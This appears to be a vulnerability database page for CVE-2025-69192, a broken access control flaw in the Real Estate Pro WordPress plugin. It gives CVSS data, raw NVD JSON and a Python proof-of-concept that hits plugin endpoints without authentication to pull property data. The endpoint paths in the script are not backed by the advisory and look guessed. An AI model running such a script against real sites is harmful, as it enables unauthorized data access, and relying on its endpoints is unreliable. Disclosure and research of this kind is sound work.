Security Vulnerability Report
中文
CVE-2025-69192 CVSS 7.3 HIGH

CVE-2025-69192

Published: 2026-01-22 17:16:26
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins Real Estate Pro real-estate-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Real Estate Pro: from n/a through <= 2.1.5.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Real Estate Pro plugin <= 2.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69192 PoC - Real Estate Pro Plugin Broken Access Control import requests import sys TARGET_URL = "https://vulnerable-site.com" PLUGIN_PATH = "/wp-content/plugins/real-estate-pro/" def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-69192""" # Try to access admin functionality without authentication endpoints = [ f"{TARGET_URL}{PLUGIN_PATH}includes/api/get-properties.php", f"{TARGET_URL}{PLUGIN_PATH}admin/ajax/save-property.php", f"{TARGET_URL}{PLUGIN_PATH}includes/api/export-data.php", f"{TARGET_URL}{PLUGIN_PATH}admin/controller.php?action=list_users" ] for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200 and "admin" in response.text.lower(): print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Response snippet: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[-] Target may not be vulnerable or is unreachable") return False def exploit_unauthorized_access(): """Exploit the vulnerability to access sensitive data""" # Exfiltrate property data without authentication exploit_url = f"{TARGET_URL}{PLUGIN_PATH}includes/api/get-properties.php" data = {"all": "1", "format": "json"} try: response = requests.post(exploit_url, data=data, timeout=10) if response.status_code == 200: print("[+] Successfully accessed property data without auth") print(f"[+] Data: {response.text[:500]}") return response.json() except Exception as e: print(f"[-] Exploitation failed: {e}") return None if __name__ == "__main__": print("CVE-2025-69192 Real Estate Pro Plugin PoC") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69192", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:26.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins Real Estate Pro real-estate-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Real Estate Pro: from n/a through <= 2.1.5."}, {"lang": "es", "value": "Vulnerabilidad de Autorización faltante en e-plugins Real Estate Pro real-estate-pro permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Real Estate Pro: desde n/a hasta &lt;= 2.1.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/real-estate-pro/vulnerability/wordpress-real-estate-pro-plugin-2-1-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}